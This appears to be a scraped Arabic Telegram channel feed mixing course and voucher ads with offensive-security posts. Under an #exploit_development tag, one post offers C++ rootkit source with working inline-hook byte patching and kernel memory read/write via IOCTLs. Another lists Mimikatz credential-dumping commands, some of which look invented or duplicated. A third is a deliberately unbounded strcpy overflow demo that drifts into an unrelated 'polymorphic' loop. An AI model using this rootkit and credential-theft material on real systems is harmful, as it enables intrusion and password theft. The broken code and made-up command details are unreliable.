code arabs | كود عربي

كورس vue.js من المقدم م/عبد الرحمن ❤️‍🔥 ما هي vue.js ؟ 🤔 Vue.js هي إطار عمل لجافا سكريبت تم تطويره لبناء واجهات مستخدم متقدمة وقابلة للتطوير بشكل سريع. لها العديد من المميزات التي تجعلها شائعة ومفضلة بين مطوري الويب. تم حصول علي خصم 50٪ 🔥 السعر الاصلي: 100$ بعد الخصم 50$ 🔥 متطلبات الكورس: إن تكون تعلمت html , css , js المميزات: 1. سهولة الاستخدام والتعلم: Vue.js يوفر تجربة مطور ودية وسهلة الفهم، مما يسمح للمطورين بالبدء بسرعة وفهم الأساسيات بشكل سريع. 2. مرن وخفيف الوزن: Vue.js صغير الحجم ويتكون من عدد قليل من المكونات الأساسية، مما يجعله مناسبًا للاستخدام في تطبيقات الويب الخفيفة والحديثة. 🫡 3. تكامل سلس: يمكن دمج Vue.js بسهولة مع تطبيقات أخرى القائمة على جافا سكريبت، مثل React أو Angular، كما يمكن دمجه مع القوالب HTML التقليدية. 👍 4. إمكانيات المكونات: Vue.js يتيح إنشاء واستخدام المكونات بشكل سهل ومرن، مما يزيد من إعادة استخدام الكود ويسهل صيانته وتطويره. 😏 5. نظام إدارة الحالة: يأتي Vue.js مع أدوات لإدارة الحالة مثل Vuex، مما يسهل إدارة وتنظيم حالة التطبيق بشكل فعال. 💃 للتواصل و معرفه تفاصيل اكثر مع المهندس : @Abdalrahman0x80 ✅ طاب يومكم 🔥

📣 بث مباشر قريبا ..... 👤 المقدم : Eng.Mohamed Ashraf القناة : Technology Makers ✍️ الموضوع : طريقك الصحيح لدخول مجال الـBlue Team 🔍 الموعد : سيتم بدأ البث المباشر علي قناتنا الرسمية في التلجرام بتاريخ 2024/7/8 الساعة 11 ليلا ! يمكنك الوصول الي قنواتنا عن طريق الرابط التالي : [أضغط هنا] ✅

هديه من قناه code arabs 🔥 -خصم 50٪ علي كورسات اكاديميه netriders 😏 -الذي تقدم منهاج elearn security باللغه العربيه و بشكل رائع و المنصه يوجد بها 30+ الف متعلم 🔥 كود الفاوتشر 🔥

Amr_48YiW

بشرط التواصل مع المهندس و التكلم معه و تقول انك تبعي 👍 @Ox_Amr شكرا لكم 💃

باختصار

⭐️ مستودعات الاستغلال و كشف الثغرات العربية DrXploit 🔍⭐️ 👤 الكاتب : Taha Mohamed ⚙️القناة : Technology Makers 📌 رابط الاداة : [ Github ] 📱 رابط المنشور علي انستجرام : [ أضغط هنا ] يمكنك الوصول الي قنواتنا عن طريق الرابط التالي : [أضغط هنا] ✅

🟥 تم فهرسه جميع كورسات لسهولة الرجوع اليها من هنا 😍📝 https://t.me/indexcodearabs

🔹 🔠🔠🔠 | للاعلان علي قناتنا 🟥 للاعلان علي قناتنا توجد عروض مميزه لدينا لفتره محدوده 🔥

لمده يوم بـ 3$ لمده يومين بـ5$ لمده ثلاث ايام بـ7$

🚨 { للطلب } 🚨{ للاستفسار }

🔥 Tryhackme voucher code 😟 1 Month  210 LE 😟 2 Month  420 LE Crypto or Vodafone cash 💵 💲 ✈️ @Mrsud0B 🔥 العرض لفتره محدوده 3 Month 600 LE 🔥 🫡 @Mrsud0B

📣 مقطع جديد : 👤 المقدم : Eng.Abdelrahman 0x80 ✍️ الموضوع : Session 2 PowerShell : PowerShell Vs Bash Shell Vs Cmd 🖥 رابط الفيديو : [ أضغط هنا ] يمكنك الوصول الي قنواتنا عن طريق الرابط التالي : [أضغط هنا] ✅

⭐️ بداية الطريق الي اختبار اختراق المواقع 🔍⭐️ 👤 الكاتب : Taha Mohamed ⚙️القناة : Technology Makers official 📱 رابط المنشور علي انستجرام : [ أضغط هنا ] @TechnologyMakers ✅ @codearabs ✅ @Abdalrahman0x80_channel ✅

📣 مقطع جديد : 👤 المقدم : Eng.Youssef Abdelrazek ✍️ الموضوع : شرح الـString Methods و انواعها في لغة بايثون 2024 | EP. 9 🔍 رابط الفيديو : [ أضغط هنا ] @TechnologyMakers ✅ @codearabs ✅ @Abdalrahman0x80_channel ✅

📣 قريبا ..... 👤 المقدم : Exploit Time ✅ ✍️ الموضوع : Malware Development Podcast ✅ 🥰مطلوب : اكتبو الاسئلة بتاعت بكره الي هتتسأل في البث مع البشمهندس وياريت كلها تكون فقط في مجال المالوير ✏️ 📱 Soon ... .. . 🚫 @TechnologyMakers ✅ @codearabs ✅ @Abdalrahman0x80_channel ✅

📣 مقطع جديد : 👤 المقدم : Abdalrahman0x80 ⚙ ✍️ الموضوع : Linux Bypass this Char "/" 🐧 🌐 القناة : Exploit Time @TechnologyMakers ✅ @codearabs ✅ @Abdalrahman0x80_channel ✅

علشان تعمل Rootkit بيفكك نواة الويندوز بلغة السي 👩‍💻 هنستخدم أسلوب الـOOP ونقسم الكود إلى كلاسز. ركز معايا وهقولك كل حاجة:⏰ 1. كلاس الـ Rootkit:❓ - بيحتوي على الدوال الأساسية اللي هتفكك بيها النواة.📦 - هتحتاج هنا تكتب دالة لتحميل الدرايفر، ودالة تانية للتعامل مع الـIOCTLs.🔐

#include <Windows.h>
#include <iostream>

class Rootkit {
public:
    Rootkit();
    ~Rootkit();
    bool LoadDriver(const char* driverPath);
    bool UnloadDriver();
    bool SendControlCode(DWORD controlCode, LPVOID inBuffer, DWORD inBufferSize, LPVOID outBuffer, DWORD outBufferSize);

private:
    HANDLE hDevice;
};

Rootkit::Rootkit() {
    // كونستركتور
    hDevice = INVALID_HANDLE_VALUE;
}

Rootkit::~Rootkit() {
    // ديستركتور
    if (hDevice != INVALID_HANDLE_VALUE) {
        CloseHandle(hDevice);
    }
}

bool Rootkit::LoadDriver(const char* driverPath) {
    // هنا بنحمل الدرايفر
    // لازم تكتب كود التحميل الفعلي هنا
    return true;
}

bool Rootkit::UnloadDriver() {
    // هنا بنشيل الدرايفر
    // لازم تكتب كود الإزالة الفعلي هنا
    return true;
}

bool Rootkit::SendControlCode(DWORD controlCode, LPVOID inBuffer, DWORD inBufferSize, LPVOID outBuffer, DWORD outBufferSize) {
    // هنا بنبعت IOCTL للنواة
    if (hDevice == INVALID_HANDLE_VALUE) {
        return false;
    }
    DWORD bytesReturned;
    return DeviceIoControl(hDevice, controlCode, inBuffer, inBufferSize, outBuffer, outBufferSize, &bytesReturned, NULL);
}

2. كلاس الـ Hooking:❓ - بيحتوي على الدوال اللي هتعمل hooking للـ SSDT.🤕 - هنحتاج هنا نكتب دوال للـ inline hooks وdetour.‼️

class Hooking {
public:
    Hooking();
    ~Hooking();
    bool SetInlineHook(LPVOID targetFunction, LPVOID hookFunction);
    bool RemoveInlineHook(LPVOID targetFunction);

private:
    BYTE originalBytes[5];
};

Hooking::Hooking() {
    // كونستركتور
}

Hooking::~Hooking() {
    // ديستركتور
}

bool Hooking::SetInlineHook(LPVOID targetFunction, LPVOID hookFunction) {
    // هنا بنعمل inline hook
    DWORD oldProtect;
    VirtualProtect(targetFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    memcpy(originalBytes, targetFunction, 5);
    DWORD relativeAddress = ((DWORD)hookFunction - (DWORD)targetFunction - 5);
    *((BYTE*)targetFunction) = 0xE9;
    *((DWORD*)((BYTE*)targetFunction + 1)) = relativeAddress;
    VirtualProtect(targetFunction, 5, oldProtect, &oldProtect);
    return true;
}

bool Hooking::RemoveInlineHook(LPVOID targetFunction) {
    // هنا بنشيل الـ inline hook
    DWORD oldProtect;
    VirtualProtect(targetFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    memcpy(targetFunction, originalBytes, 5);
    VirtualProtect(targetFunction, 5, oldProtect, &oldProtect);
    return true;
}

3. كلاس الـ Communication:❓ - بيحتوي على الدوال اللي بتعمل التواصل مع الدرايفر. 🕦 - هنحتاج هنا نكتب دوال للقراءة والكتابة من وإلى النواة.‼️

class Communication {
public:
    Communication();
    ~Communication();
    bool ReadMemory(DWORD_PTR address, LPVOID buffer, SIZE_T size);
    bool WriteMemory(DWORD_PTR address, LPCVOID buffer, SIZE_T size);

private:
    Rootkit* rootkit;
};

Communication::Communication() {
    // كونستركتور
    rootkit = new Rootkit();
}

Communication::~Communication() {
    // ديستركتور
    delete rootkit;
}

bool Communication::ReadMemory(DWORD_PTR address, LPVOID buffer, SIZE_T size) {
    // هنا بنقرأ من الذاكرة
    return rootkit->SendControlCode(/*IOCTL_READ_MEMORY*/, &address, sizeof(address), buffer, size);
}

bool Communication::WriteMemory(DWORD_PTR address, LPCVOID buffer, SIZE_T size) {
    // هنا بنكتب في الذاكرة
    return rootkit->SendControlCode(/*IOCTL_WRITE_MEMORY*/, &address, sizeof(address), (LPVOID)buffer, size);
}

بهذا الشكل، الكود هيبقى مقسم ومنظم باستخدام الـOOP.🌐 كل كلاس يقوم بوظيفة معينة، وبكده يبقى عندك Rootkit قابل للتوسيع والتطوير بسهولة.🔐 تحياتنا لكم من فريق "Technology Makers"! 🥰 🥰 للوصول لمقالات من هذا النوع يمكنك الضغط علي الهاشتاغ التالي : ➡️ #exploit_development 👑Our Channels : [ Click Here To Join ]

ما هي Mimikatz : ‼️ ميمي كاتز هي أداة متقدمة جدًا للمخترقين حيث تمكنهم من عمل اشياء كثيرة مثل التجسس على الأنظمة و تعميق خطورة الاختراق.🔐 سبب تطويرها : ❓ تم تطوير اداة ميمي كاتز عشان تساعد المحققين الرقميين والباحثين في الأمن السيبراني في استخراج معلومات من الأنظمة. ✅ المطور: 👤 الأداه دي تم تطويرها من قبل باحث أمني فرنسي اسمه بنيامين ديلبي في سنة 2011 و ايضا ميمي كاتز ممكن تستغل ثغرات في أنظمة ويندوز عشان تسحب كلمات المرور والمعلومات الحساسة من ذاكرة النظام .🌐 الأوامر الموجودة في ميمي كاتز و وظائفها هي كالتالي :⚙ الـprivilege::debug بيشغل صلاحيات التصحيح في النظام، وده بيدي الهكر قدرة على التحكم الكامل في النظام.🤬 الـsekurlsa::logonpasswords بيستخرج كلمات المرور المخزنة في النظام، وده معناه إن الهكر يقدر يحصل على كلمات المرور بدون ما يبذل جهد كبير.🔐 الـsekurlsa::tickets بيعرض تذاكر الكيربيروس المخزنة في النظام، ودي بتساعد الهكر في الاستيلاء على الجلسات الحالية واستخدامها للوصول للموارد بدون إعادة المصادقة.📱 الـlsadump::sam بيقوم بتفريغ ملفات SAM اللي بتحتوي على كلمات مرور المستخدمين في النظام، وده بيسمح للهكر بإعادة استخدام كلمات المرور دي في هجمات أخرى.📤 الـlsadump::secrets بيظهر الأسرار المخزنة في النظام، وده بيساعد الهكر في الوصول لمعلومات حساسة.🪄 الـtoken::elevate بيحاول يرفع الصلاحيات في النظام، وده معناه إن الهكر يقدر ياخد صلاحيات أعلى ويسيطر على النظام بالكامل.⚔️ الـvault::cred بيعرض معلومات الاعتمادات المخزنة في خزنة الويندوز، ودي معلومات ممكن تكون حساسة جدًا.😧 الـdpapi::cred بيظهر بيانات DPAPI اللي بتستخدم لحماية البيانات في النظام، وده بيساعد الهكر في فك تشفير البيانات المحمية.🤕 الـcrypto::capi بيعرض مفاتيح CAPI المخزنة في النظام، وده بيساعد الهكر في فك تشفير الاتصالات المشفرة. ✉️ الـcrypto::certificates بيظهر معلومات عن الشهادات المخزنة في النظام، ودي بتساعد الهكر في فهم البنية التحتية للشبكة والتخطيط لهجمات مستقبلية.❗️ الـcrypto::keys بيعرض المفاتيح المخزنة في النظام، وده بيساعد الهكر في فك تشفير البيانات. 🛠 الـmisc::memssp بيظهر بيانات SSP المخزنة في الذاكرة، وده بيساعد الهكر في استغلال الجلسات الحالية. 🧠 الـmisc::sysinfo بيعرض معلومات عن النظام، وده بيساعد الهكر في فهم بيئة العمل والتخطيط للهجوم. 😈 الـmisc::wifi بيظهر ملفات تعريف الواي فاي المخزنة في النظام، وده بيساعد الهكر في الوصول لشبكات الواي فاي المخزنة. 🙈 الـkerberos::list بيعرض قائمة بذاكرة الكيربيروس المخزنة في النظام، وده بيساعد الهكر في استغلال الجلسات الحالية. 🎖 الـkerberos::tgt بيظهر معلومات TGT، ودي بتساعد الهكر في الاستيلاء على الجلسات. ❌ الـkerberos::ptt بيسمح للهكر بتمرير ذاكرة كيربيروس للنظام، وده بيساعد الهكر في الدخول للموارد بدون إعادة المصادقة. ☄️ الـkerberos::kerberos بيعرض تذاكر الكيربيروس المخزنة، وده بيساعد الهكر في الاستيلاء على الجلسات. 💪 الـlivessp::tspkg بيستخرج معلومات TSPKG من LSASS، وده بيساعد الهكر في الحصول على كلمات المرور. 🛡 الـlivessp::msv بيظهر الاعتمادات المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 📀 الـlivessp::credman بيعرض معلومات CredMan المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 👑 الـlivessp::tspkrd بيظهر بيانات TSPKG المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 📀 الـlivessp::wdigest بيظهر بيانات WDigest المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 📀 الـlivessp::kerberos بيظهر بيانات كيربيروس المخزنة في النظام، وده بيساعد الهكر في الاستيلاء على الجلسات. 🔓 الـlivessp::wdigest بيظهر بيانات WDigest المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. ⬆️ الـlivessp::cred بيظهر بيانات LSASS المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور.⬆️ الخاتمة 🥰: ميمي كاتز أداة قوية جدًا وخطيرة في عالم الاختراق استخدام الأداة دي بيد المخترق قدرة هائلة على اختراق الأنظمة والسيطرة عليها بالكامل.🤬 ومن المهم جدًا إنك تتخذ إجراءات أمنية قوية لحماية نظامك من الأدوات دي، زي تحديث النظام باستمرار، وتفعيل خصائص الحماية المتقدمة، وتوعية المستخدمين بالمخاطر الأمنية. 🥰⚙✔️ تحياتنا لكم من فريق "Technology Makers"! 🥰 🥰 للوصول لمقالات من هذا النوع يمكنك الضغط علي الهاشتاغ التالي : ➡️ #exploit_development 👑Our Channels : @TechnologyMakers ✅ @codearabs ✅ @Abdalrahman0x80_channel ✅

ما هي ثغره buffer overflow ؟ 🤔 هو خطأ في برمجة البرمجيات أو ثغرة ممكن تستغلها حتي تقدر تصل لوصول غير المصرح به لـ انظمه الشركات يحدث  عندما يتجاوز حجم البيانات في الذاكرة المؤقتة (المخزنة في مساحات متتالية من الذاكرة) سعتها التخزينية. 📂 ‼️ قبل أن نعرف كيف تحدث هذه الهجمه علينا أن نعرف ثلاث مصطلحات مهمه : 1- الـBuffer 🔗: هو جزء من الذاكرة يستخدم لتخزين البيانات بشكل مؤقت أثناء معالجتها. ⚙ 2-الـHeap 🔗: هو جزء من الذاكرة يمكن تخصيصه وإعادة تخصيصه ديناميكيًا حسب متطلبات البرنامج. ⚙ 3-الـStack 🔗: هو بنية بيانات تستخدم لتنفيذ الاستدعاءات التبادلية (مثل استدعاء الدوال) وتعمل وفق مبدأ "الأخير دخولًا، الأول خروجًا" (LIFO). ⚙ كيف تحدث هجمة Buffer Overflow ؟ - يحدث عندما يتم تجاوز حدود منطقة الذاكرة المؤقتة (البافر) المخصصة لتخزين البيانات. هذا يمكن أن يؤدي إلى تلف البيانات أو الكتابة فوقها. هنا مثال بسيط باستخدام لغة البرمجة C:👩‍💻 🌐 الدوال و التهيئة: ⚙

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
// Function to generate a random hash
void generate_random_hash(char *hash, size_t length) {
    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    if (length) {
        for (size_t n = 0; n < length - 1; n++) {
            int key = rand() % (int)(sizeof(charset) - 1);
            hash[n] = charset[key];
        }
        hash[length - 1] = '\0';
    }
}

- هنا بنعمل include لمجموعة مكتبات أساسية في C عشان نقدر نستخدم الدوال اللي فيها.⚙ - بعد كده، عرفنا دالة اسمها `generate_random_hash`، واللي بتعمل Hash عشوائي بطول معين.⚙ -الـcharset هو عبارة عن مجموعة من الحروف والأرقام اللي بنستخدمها عشان نكون الـHash.⚙ - بنستخدم rand() عشان نجيب رقم عشوائي ونستخدمه عشان نختار حرف من charset.⚙ الجزء الثاني: الدالة الرئيسية main 🕦

int main(int argc, char *argv[]) {
    // Allocate 5 bytes for the buffer plus null terminator
    char buffer[5];
    char current_hash[33]; // Store the current hash
    time_t start_time, current_time;

    if (argc < 2) {
        printf("strcpy() not executed....\n");
        printf("Format: %s <characters>\n", argv[0]);
        exit(0);
    }
    // Generate an initial hash
    srand(time(NULL));
    generate_random_hash(current_hash, sizeof(current_hash));
    // Copy user input to the buffer without boundary checking
    strcpy(buffer, argv[1]);
    printf("Buffer content: %s\n", buffer);
    printf("strcpy() executed...\n");
    // Set time to start polymorphism
    start_time = time(NULL);

- الـbuffer بيخصص 5 بايت عشان نخزن فيه المدخلات من المستخدم.📱 - الـcurrent_hash بيخزن الـHash العشوائي الحالي.📱 - بنشيك على عدد المدخلات اللي جاية من المستخدم (argc) عشان نتأكد إن في مدخل على الأقل.⚙ - لو مفيش مدخل كافي، بنطبع رسالة خطأ ونخرج من البرنامج.☝ - بنستخدم srand(time(NULL)) عشان نبدأ التوليد العشوائي بناءً على الوقت الحالي. 🖥 - بنعمل توليد أولي للـHash باستخدام generate_random_hash.🔐 - بنستخدم strcpy عشان ننسخ المدخلات اللي جاية من المستخدم في `buffer`، من غير ما نعمل أي فحص للحدود.⏰ ### الجزء الثالث: التكرار الأبدي و تغيير الـ Hash 🔐:

    while (1) {
        current_time = time(NULL);

        // Change the hash every 30 seconds
        if (difftime(current_time, start_time) >= 30) {
            generate_random_hash(current_hash, sizeof(current_hash));
            printf("Hash changed to: %s\n", current_hash);
            start_time = current_time;
        }
        // Execute dynamic codes or other updates here
        // This part may include malicious code like loading new scripts or changing behavior
        sleep(1); // Reduce processor usage
    }
    return 0;
}

- بنعمل while (1) عشان ندخل في حلقة لا نهائية. - بنقيس الوقت الحالي (current_time) و بنقارن الوقت اللي فات (difftime) عشان نشوف إذا عدت 30 ثانية. - لو عدت 30 ثانية، بنغير الـHash باستخدام generate_random_hash وبنطبع الـHash الجديد. - بنحدث الوقت اللي بدأنا منه (start_time). - في الجزء ده ممكن نضيف أكواد ديناميكية أو تحديثات (وده ممكن يشمل أكواد خبيثة). - بنستخدم sleep(1) عشان نقلل استخدام المعالج. وهذا كان التحليل الخاص بالكود نلقاكم بإذن الله في الجزء الثاني من المقال🥰 @TechnologyMakers_Articles ✅ @codearabs ✅